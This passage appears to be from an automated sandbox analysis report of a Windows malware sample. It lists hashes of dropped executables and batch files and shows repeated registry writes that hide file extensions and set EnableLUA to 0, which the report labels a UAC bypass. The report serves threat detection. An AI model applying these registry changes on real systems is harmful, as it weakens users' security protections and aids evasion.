SHA512 ccb11eb812dd2c957dee08a95d1938f28f1e7512b483d7bd148e5dfd6388bbee152a11185abeabcdecd669e9dea44da6ea570b8aeb2e4f806fa379edda8c9ae2

C:\Users\Admin\AppData\Local\Temp\QcAU.exe

MD5 020dc3e0679714ded30ff39cca1b5be0
SHA1 9e4e365720036bcc03fb63fb109c7dcc235fd8de
SHA256 cbde0a0ab06cd92c5d19319dfdca2be10e10f213addc78a90e5c8c483af8b51e
SHA512 e81b53276f7aafa1dafd09f70a76c8361e1b4f46f8d03725896f38136d05a6ae93e2204550384339b8b1a46e61dc544a3e1b12b2271520691464140f1d461c76

C:\Users\Admin\AppData\Local\Temp\CowK.exe

MD5 1c53302166a4a085b840c2c3de841543
SHA1 254cc8c46b31797f30c41167c1108c7ea6f7ce65
SHA256 1d9a036075133f682e322785a04299d9d34bcdc63eb02a3691933d39777215a4
SHA512 21f004578f2f757eb26fd2fb76f300a8e5adcca942b6364610b9aa95b4a2bbb6471f5fb9b4fed2305e550debaa1a1d10bee3a6115dbf58a1c3b3914cf20049ca

C:\Users\Admin\AppData\Local\Temp\acQO.exe

MD5 957302bceb9b26015e48e7224a8e4481
SHA1 927318c8fb0976de913103903b23f9b3f18af9dd
SHA256 31c194753aefdde73deb88dd0b989d72e5ffb5e60658a757d83772b852a92259
SHA512 7d03ff87ffb43a33a0367c8f015aa3975d137699e0af84f2bb50f83433770d47bd3894e25ddf62209114daaf2d314cf0a3f758e77f5db1fa3bbfe7f94fc1b4b3

C:\Users\Admin\AppData\Local\Temp\ksYg.exe

MD5 dbdb361d4dcac7943f5dd0a692dd4a39
SHA1 e29b34f6fae32d45c4522fd0579946157f19722f
SHA256 6ef8108aa2bc8a9d5a5b1bb2ed47f9111a602e4f3a7734e1839707491eca86cf
SHA512 b5ebb8ddc395ea3e95cfa54c414cfd81ff193e58bcc4bc8877d318d49eb9609856bdc735aec0b4318e592643d2501e98a7336345cdf2797638c66619f894cf03

C:\Users\Admin\AppData\Local\Temp\CGUoUoUs.bat

MD5 577e826a6e17fd970c9e41e2560f6522
SHA1 293b2d5bafadfbdd6001db224d8f947e06246a06
SHA256 bb6362a3e848f35e9218089dbdcb25cec8f756f22acefdb721032c1425a549b7
SHA512 b5c631d9dede4380b880e2dd1b01e8f0e5e7034164076b993955257c9ff1c98dc42b8d2cd0b6bac7c1626d9a3c5fd86cfdd9cd1275fee624c50b22de9435f47d

C:\Users\Admin\AppData\Local\Temp\YUMU.exe

MD5 41c2896ac00d2da73ba6606a307e4b8c
SHA1 3c3379998b6f189f5cf276b22454982b6fb03fdc
SHA256 09e39702c9ce17aa4ba931e9da3bc969a029986f267a06b471847acd93aadd7b
SHA512 c1181fcb26581f7e8a3b148318226c462c86a555870a2384e54e290c2a0357107c97e512932c08140744212dc792925971977b116cfb2b36448162928c3aeedc

C:\Users\Admin\AppData\Local\Temp\swwk.exe

MD5 560c99be3f6dcef1ac53f90e8695f518
SHA1 71bd7937c826eec8eea1baf3773bc3c6231a4f81
SHA256 ec89d0130f21d11976b412192e9411a62d88db78a385463ef42b9150cefd8030
SHA512 57a5b800b5a61f26a3c8f98986f10d07032c4cbfb9a1edfc1a387fe3e20aa606fd8be8a093aae7e219f2cd5397fdeaaac2a4cc1c4736d70d0ef867253bd8313a

C:\Users\Admin\AppData\Local\Temp\hOAMkMUg.bat

MD5 5bd64bc997950146509410b9608dacb4
SHA1 1dc312f16318853f770add16903680e5f9d39d1c
SHA256 1c5ad54f635e0a4098fec655249ab6a781d23241a3ff758e495e329cfa459a43
SHA512 d27812c8e4e968f68457dcd1904a13d86f2932e562d08395533880a4c1f78bf9f16c35cc56c4a2be2557ef42ffe312a379d1e1cac220e8f16a3412afea45877c

C:\Users\Admin\AppData\Local\Temp\VSAUMYoo.bat

MD5 23f518b78e6a0d1a3f4d361cfb517a7c
SHA1 6cd4bbaab586dd221ca754e6dca28df892acaa8c
SHA256 3a8d629e9990a67f0edb18c336ea7bb1659e0faabad2a37315d716b085eb6dab
SHA512 73adb6b6b0383a8c79084a64692961e6568a92af287d3a2aaf452d6c44223e63e3eaa872718d4c65be9a41c8b9b0d8da3c69360cc77c7a353a99ad336dcdbbfb

C:\Users\Admin\AppData\Local\Temp\jAsUEMIc.bat

MD5 888d3aaa146972c99b2b28a22ad2d050
SHA1 5d3e86e0e4fd47a83d627d8cb133d2b7658d46cd
SHA256 b1e0065db35a0a2fc3463ac46a1d5ee7a1deb4aaabaab01e7996b8d2e3f60d27
SHA512 96ce382f074148ecc2809d0fd560e977caa2740fbff4def167053ed22cf455c97bff773e1b962f736ba185b0ae636997fda06edb2998f745e5f3b58084669647

C:\Users\Admin\AppData\Local\Temp\pYIowAkM.bat

MD5 6d5c658a62bd1bc89b03926bc40c8547
SHA1 234879b0ff3e7571bacf5f9b4e962ca2e7860d9a
SHA256 abfd249705f4decf9b8680ec886e28ec93abd90f9bc076dba00077beb1f58bfb
SHA512 4e10d7c65ebffe99495b204db5769659afd5ab5b09410bf23fa252bdc6b1796d125f192e8a8229c90eb59d9078e89b71e8f1b6a4850b0fd3bd967ffb8b4867f2

C:\Users\Admin\AppData\Local\Temp\CeEooQAM.bat

MD5 c87f8133abf999fa9b8abcb1923ce1ce
SHA1 be32d73a3d28eae95fd042d7c468981b591956c6
SHA256 38c5cc56de6057004c666f4904db717b7b01ef6c56e2a71b7771cb0d54930f0b
SHA512 151aa573ae0d242933df493cd132fd04836843ce560178b88a25f92bea3524edd6dfd0944ef5932062bd70062f565822956bce9732a8d6a5981883effd73fcba

C:\Users\Admin\AppData\Local\Temp\mGgkAAUY.bat

MD5 bda9412da2875eed97c91dcc38531d53
SHA1 4be015994434184380e3d88167a566e0353fd834
SHA256 9e97a67329bc3cc3eca55cfdaf898d9751b88340f9b2abfc4e737a21c231b07b
SHA512 2419dd18ded72b5c02fb8d0c62ab0ea697d2799fbc97e272685b6f9ad2dc49dc3baaae9676e4afc6f6815bf0902a064080cc17c63c7c4932f9108d6e732322f1

C:\Users\Admin\AppData\Local\Temp\oAAYMAgg.bat

MD5 cfcf016771f7f2f556b9bcb8357e1ad0
SHA1 b3eae1f1cc890303444d2f4dcf97013d1b2ffa62
SHA256 d211929ee35a1379e00d7cf14e32bb2bce603c4071c57fb606ecfec2507bc228
SHA512 133d33a1179d8a81e2187d9a6ab3e2fd5c814a8920d5637b75909a28ba85feb1db5148f70a4c3e97577d201e8bd4dc5369ac0743b615981be4bcbf5bbc08270d

C:\Users\Admin\AppData\Local\Temp\xAYMMgAQ.bat

MD5 98e4def231c1d6c26abe8db94558c4bd
SHA1 4563523b10dc32f2a7ecdd16901e2018739c2c51
SHA256 b11666400be2630b0efd607a957fb9d54f1cf8cf44283823b73ce28e40fe4b87
SHA512 1d1e9d396c0f2ee8e2c47cc9d664da1873ff3e5ff6bc813999b01105bfa5cec6dfbc6bf6bf52755574cab666328c1e3133dd673934f29050dec8c640dfdbbaa9

C:\Users\Admin\AppData\Local\Temp\vscwgQIo.bat

MD5 9f5b3af7fc2d1298cd0534c6f34dd248
SHA1 694e5c0730d70de1408f20007811e2351e284182
SHA256 b7838a2e61da7e32bdcc27e302a1c4a95945521bab036cd709c956c083559c5a
SHA512 963d4daf785537ea14377c8a826c2d458c73cb7f3b70f7814bfc020c8116c0d0d73ba6e5a0ec75c67126a8835ea38bf673baf3dc939f7c3ff1058aa79953e12e

C:\Users\Admin\AppData\Local\Temp\pyoMoYQk.bat

MD5 fb43acbd4fa54e71ceb7f0100b5e0ed8
SHA1 28b7b31b1a6d720e6f475233bd487a5f9385990f
SHA256 7b9376735b339172220ed8ef4e46d39ef01992700eaaec54251ac18a762b66d2
SHA512 af332b22472622fc6df311f080322fdadefffbb6d63323e9f62d5db6477b64f831c7d5a950a0b285e4b631ce5ab7b476a41f1793d5adc1b625f8afae413b5ecc

C:\Users\Admin\AppData\Local\Temp\fwIYsUko.bat

MD5 7ee847d1448f39f34e7f44bddcb4f01a
SHA1 28e7b955ffbf50828139e635564be7736107e899
SHA256 4d424c30f00c4ccba475fce896ca5201987ab29c5c1dae7e38e4aa488545de9b
SHA512 59270be0f42d003b7730965b879f7265a777f58b3e5c67cbc29b53199ec87623d48eb7e6380bbdc519f89c2c906fe4ee9af78d60ffdf0c32df49e89c6cbff75e

C:\Users\Admin\AppData\Local\Temp\SkIEIgMs.bat

MD5 79e70c2f88a320ba7e491eec731b877b
SHA1 301d0e6644a97dc234d9ea44b5ad84df4fe34d4f
SHA256 e71ffb1106ac2273c317ca9dc250689458c4f7b919a1ec9145b59dd1f4ca07fc
SHA512 b9056a1be9b99b5c5499d99d5be4d84ad676fd863ba5aa0c619dbdeb839e8bfa9dd617dbedc35937451afe41d7c3dae88088d054090d1b900ae67c0e6276bc53

C:\Users\Admin\AppData\Local\Temp\WSYYMAcA.bat

MD5 d2f8cf29d44583fd30457ef147056478
SHA1 ce1d32350daf261544361e87936c86f36feef0ad
SHA256 a66e2407beecac6841f8c662c9c6506cf412e371959e6b904c2ac2f9c56e3612
SHA512 40b0a176ec567c741555694b4b30d74499dfb893b65a65d877bc6012ce9b1580fcea5861fbe522387541666d5bc40784084d565a141915608fe7755a4baa03b0

C:\Users\Admin\AppData\Local\Temp\cMcEoIsg.bat

MD5 a86989ddd983e980d061908a61e9b737
SHA1 a9dd93bca8038e1f8407045d7665cf03c71d5403
SHA256 a8e63412c8b7cef92cf1c13577d91f0261bca673ac421ce9881824afc07fd82d
SHA512 9c79a6488b56c50f2658fc859bd8683596c4d1783c9e8558d318afa1369d30164c5c64c1c7736b1b431f8297c79d14d5c59a46172fa50040574fa9b8975e7abd

C:\Users\Admin\AppData\Local\Temp\BKYEoYAQ.bat

MD5 c750a4c6199ceb1eac4659f43dab909d
SHA1 cdb8adb52249222e7184629f7cf8ba0e927175fb
SHA256 c3c33a42855ed0f1c04b2ea567fa5c8ac4ba293e09f6273db32d92fef94f6be2
SHA512 6ac492b639fe370220c1d8450e247ea90a615153227b6120f31b272f083990a3c4ac3de4e94ccfa5851a44a914e65322f860dc6550071822d625fbc088636598

C:\Users\Admin\AppData\Local\Temp\HugQEQYw.bat

MD5 dc04adf5157b361294d93dd45d36fbcf
SHA1 503c6a58ecac087f4afed6dc7bfad434203dfba5
SHA256 7d7f9cd9506298a35fc8fb1fcc9b6b32774e590f60fe6615a93b4a9789b24163
SHA512 acd1fdc65c20c5247f8e259155db49c7dbb3db86982ba84e092b5e63194b0b1252d4cb3cc17a0e1d9bbcb3e1c19038f5646585832f59cdfa661a95d045bc4b36

C:\Users\Admin\AppData\Local\Temp\necoIAUs.bat

MD5 63350624360fbcba81775bf138410ff2
SHA1 468c0902492dcf9fbeced8dbb9f1ccfb15028bbd
SHA256 d14f69b3218c54b0eb818c15e1fcc0b54e4cfa32599f6bbcb58380c99ed8b8b4
SHA512 e674703362cab8e5b3f8f60d7b3727df0928cbe700263583c146104f0e0b5e1ac911e2c19439ef4075287ff55cc3dd888a8eac05c94548984458f368391bb9bb

memory/2380-2939-0x0000000077570000-0x000000007768F000-memory.dmp

memory/2380-2940-0x0000000077470000-0x000000007756A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-26 00:06

Reported

2024-10-26 00:09

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
